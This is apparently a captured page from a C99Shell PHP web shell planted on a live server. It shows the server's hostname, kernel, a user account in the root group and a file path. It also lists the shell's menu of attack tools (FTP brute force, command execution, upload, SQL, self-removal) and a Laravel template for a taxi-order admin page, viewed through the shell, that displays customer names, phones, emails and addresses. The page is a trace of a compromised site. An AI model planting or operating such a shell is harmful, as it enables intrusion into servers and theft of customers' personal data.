!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/resources/views/taxi_order/   drwxr-xr-x
Free 26.46 GB of 117.98 GB (22.43%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     all_orders.blade.php (5.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.admin')
@section('page-title')
    {{__('Taxi Order')}}
@endsection
@push('script-page')
@endpush
@section('breadcrumb')
    <li class="breadcrumb-item"><a href="{{route('dashboard')}}">{{__('Dashboard')}}</a></li>
    <li class="breadcrumb-item">{{__('Taxi Order')}}</li>
@endsection
@section('action-btn')
    <div class="float-end">
    </div>
@endsection

@section('content')

    <div class="row">
        <div class="col-xl-12">
            <div class="card">
                <div class="card-body table-border-style">
                    <div class="table-responsive">
                        <table class="table datatable">
                            <thead>
                            <tr>
                                <th>{{__('Customer Profile')}}</th>
                                <th>{{__('Destination')}}</th>
                                <th>{{__('Total Km')}}</th>
                                <th>{{__('Kilometer Price')}}</th>
                                <th>{{__('Total Cost')}}</th>
                                <th>{{__('Status')}}</th>
                            </tr>
                            </thead>
                            <tbody>
                                @if ($texiorders->isNotEmpty())
                                @foreach ($texiorders as $taxiOrder)
                            <tr class="font-style">
                                <td>
                                    <div class="customer-profile-sec">
                                    <div class="customer-name-sec">
                                        <strong>{{__('Customer Name')}} :</strong>  {{isset($taxiOrder->order_request->name)?$taxiOrder->order_request->name:''}}
                                    </div>
                                    <div class="customer-phone-sec">
                                        <strong>{{__('Customer Phone')}} :</strong>  {{isset($taxiOrder->order_request->phone_number)?$taxiOrder->order_request->phone_number:''}}
                                    </div>
                                    <div class="customer-email-sec">
                                        <strong>{{__('Customer Email')}} :</strong>  {{isset($taxiOrder->order_request->email)?$taxiOrder->order_request->email:''}}
                                    </div>
                                    </div>
                                </td>
                                <td>
                                    <div class="destination-sec">
                                        <div class="pick-up-address">
                                            <strong>{{__('From')}} :</strong> {{isset($taxiOrder->order_request->pickup_address)?$taxiOrder->order_request->pickup_address:''}}
                                        </div>
                                        <div class="destination-address">
                                            <strong>{{__('To')}} :</strong> {{isset($taxiOrder->order_request->destination_address)?$taxiOrder->order_request->destination_address:''}}

                                        </div>
                                    </div>
                                </td>
                                <td>{{isset($taxiOrder->order_request->total_km)?$taxiOrder->order_request->total_km:''}}</td>
                                <td>{{\Auth::user()->priceFormat(isset($taxiOrder->order_request->kilometer_price)?$taxiOrder->order_request->kilometer_price:0)}}</td>
                                <td>
                                    @if (isset($taxiOrder->order_request->total_cost) && $taxiOrder->order_request->total_cost)
                                    {{\Auth::user()->priceFormat($taxiOrder->order_request->total_cost)}}
                                @endif
                                </td>
                                <td>
                                 <div class="driver-status-section">
                                        @if (isset($taxiOrder->order_request->status) && $taxiOrder->order_request->status)
                                            @if($taxiOrder->order_request->status=='accepted')
                                            <span class="badge badge-success">{{ucfirst($taxiOrder->order_request->status)}}</span>
                                            @else
                                            <span class="badge badge-danger">{{ucfirst($taxiOrder->order_request->status)}}</span>
                                            @endif
                                        @endif
                                    </div>
                                </td>
                            </tr>
                            @endforeach
                            @else
                            <tr class="font-style text-center">
                                <td colspan="6">No Data Available</td>
                            </tr>
                        @endif

                            </tbody>
                        </table>
                    </div>
                </div>
            </div>
        </div>
    </div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--